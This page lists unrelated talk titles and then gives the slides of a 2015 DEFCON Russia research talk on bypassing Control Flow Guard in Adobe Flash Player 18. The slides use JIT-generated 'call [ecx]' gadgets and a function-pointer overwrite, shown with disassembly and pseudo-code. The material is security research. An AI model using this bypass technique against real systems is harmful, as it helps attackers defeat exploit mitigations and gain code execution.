2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 

Advanced cfg bypass on adobe flash player 18 defcon russia 23

  • 1. Saint Petersburg 2015 Advanced CFG Bypass on Adobe Flash Player 18 and Windows 8.1 Yurii Drozdov Liudmila Drozdova Center of Vulnerability Research DEFCON Russia (DCG# 7812)
  • 2. Background  CFG (Control Flow Guard) – indirect call validation  Detailed CFG description in many sources  Adobe Flash Player CFG sinceWindows 8.1 update 3  Adobe Flash CFG Bypass before June 2015– CoreSecurity  After June 2015 – this research
  • 3.
  • 4. Experimental class class ExploitClass { function func1(arg1, arg2, … , argn) { func2(arg1, arg2, …, argn); } function func2(arg1, arg2, … , argn) { func3(arg1, arg2, …, argn ) } function func3(arg1, arg2, … , argn) { ... } } All methods of ExploitClass will be compiled by JIT compiler in machine code
  • 5. JIT-generated function call from JIT code (func1 calls func2) 56 push esi 50 push eax 51 push ecx 8bc8 mov ecx,eax b840aa0f77 mov eax, LdrpValidateUserCallTarget (770faa40) ffd0 call eax -> CFG check 59 pop ecx 58 pop eax ffd0 call eax -> call of validated function (func2) 83c410 add esp,10h
  • 6. Saving parameters in JIT code for JIT function Instructions, which are used for saving parameters can look like this 8b5de0 mov ebx,dword ptr [ebp-20h] 897d88 mov dword ptr [ebp-78h],edi 8b7de8 mov edi,dword ptr [ebp-18h] 89758c mov dword ptr [ebp-74h],esi or this 8bbde8feffff mov edi,dword ptr [ebp-118h] 898df4feffff mov dword ptr [ebp-10Ch],ecx 8b8decfeffff mov ecx,dword ptr [ebp-114h] 89b5c0feffff mov dword ptr [ebp-140h],esi Different opcodes!
  • 7.
  • 8. Key points  Usage one of the parameters of func2 as controlled address  Arguments are in stack in original state  Arguments sometimes can be duplicated in registers  One of argument can be saved in ecx  We can find and change func2 pointer in ExploitClass object  We can transfer control to any part of JIT function  CFGBitmap for allocated by NtAllocVirtualMemory executable memory (JIT memory) has all‘1’ bits.  Transfer control to EIP-change instruction in JIT code– in our case ecx-control-transfer instruction
  • 9.
  • 10. CALL ECX generation in func2 In JIT code call ecx doesn't exist normally, but we can try to generate it via:  one big instruction  two separate ones. Call ecx opcode is FF D1. We found following options in our experimental module 1. 33FF XOR EDI,EDI D1F8 SAR EAX,1 2. 8B8D 04FFFFFF MOV ECX,DWORD PTR [EBP-FC] D1E1 SHL ECX,1 3. 898D 70FFFFFF MOV DWORD PTR [EBP-90],ECX D1EB SHR EBX,1 4. 8D51 FF LEA EDX,DWORD PTR DS:[ECX-1] D1FE SAR ESI,1 5. C785 00FFFFFF D1000000 MOV DWORD PTR [EBP-100],0D1 2,3,5 – Looks like parameter saving code in JIT
  • 11. Instructions with different opcodes for saving parameters in JIT code  Different instructions can be used for saving parameters. For example  C785 00FFFFFF 01000000 MOV DWORD PTR [EBP-100],1  C745 8C 01000000 MOV DWORD PTR [EBP-74],1  If in the instruction  MOV DWORD PTR [EBP-X], N  X> 0x80, first variant will be generated  X<= 0x80, second one will be generated
  • 12. How to force Flash to use ‘proper’ parameter saving code ?  MOV DWORD PTR [EBP-X], N  X> 0x80, first variant will be generated  X<= 0x80, second one will be generated  We can influence on X in JIT function via local variables, number of other functions calls inside JIT function, number of their parameters.  We need to prepare func2 before call of func3 and force flash to use fist variant of opcode  We added more local variables, additional calls etc.
  • 13. MOV DWORD PTR [EBP-X],0D1h Attempt function func2(arg1, arg2,...,argn) { var localvar1; var localvar2; .... func3(arg1, arg2,...,0xD1,..., argn ) } Result MOV EBX,18C731Eh XOR EBX,18C73CFh ; EBX == 0D1h MOV DWORD PTR [EBP-X],EBX Instead of MOV DWORD PTR [EBP-X],0D1h Fail 
  • 14. Alternative generation of call ecx Using of two instructions 898D 70FFFFFF MOV DWORD PTR [EBP-90],ECX D1EB SHR/SHL/… EBX,1 Attempt was any_var1 = any_var2<<1 But instead of desired D1E2 SHL EDX,1 we got the same instruction, but with alternative opcode (probably because it is easier to generate it). C1 E2 01 SHL EDX, 1 Fail again 
  • 15. Alternative  Call [ecx] with opcode FF 11 is alternative  Let’s try to get MOV DWORD PTR [EBP-X],11h
  • 16. MOV DWORD PTR [EBP-X],11h Attempt function func2(arg1, arg2 ..., argn) { var localvar1; var localvar2; .... func3(arg1, arg2,...,0x11,... , argn) } Result c78570ffffff11000000 mov dword ptr [ebp-90h],11h Bingo! 
  • 17. Number obfuscation in JIT Why we got c78570ffffff11000000 mov dword ptr [ebp-90h],11h ? 0x11 is not big number for JIT compiler and shouldn't be obfuscated. Obfuscation of numbers begins from 0x80. Numbers less than 0x80 will not be obfuscated.
  • 18. Call to controlled address  After generation of JIT func2, we have ready call [ecx].  After exploit execution we can find address of func2 inside our object and change it to call [ecx] 's address in func2.  After all manipulations after call func2 from func1 we will have transfer control to controlled address inside ecx with CFG bypass.  126aed07 ff11 call dword ptr [ecx] ds:002b:42424242=????????
  • 20.
  • 21. Links  http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring- control-flow-guard-in-windows10.pdf  http://www.powerofcommunity.net/poc2014/mj0011.pdf  https://blog.coresecurity.com/2015/03/25/exploiting- cve-2015-0311-part-ii-bypassing-control-flow-guard-on- windows-8-1-update-3/  http://cvr-data.blogspot.ru/2015/07/advanced-cfg-bypass- on-adobe-flash.html  https://helpx.adobe.com/security/products/flash- player/apsb15-11.html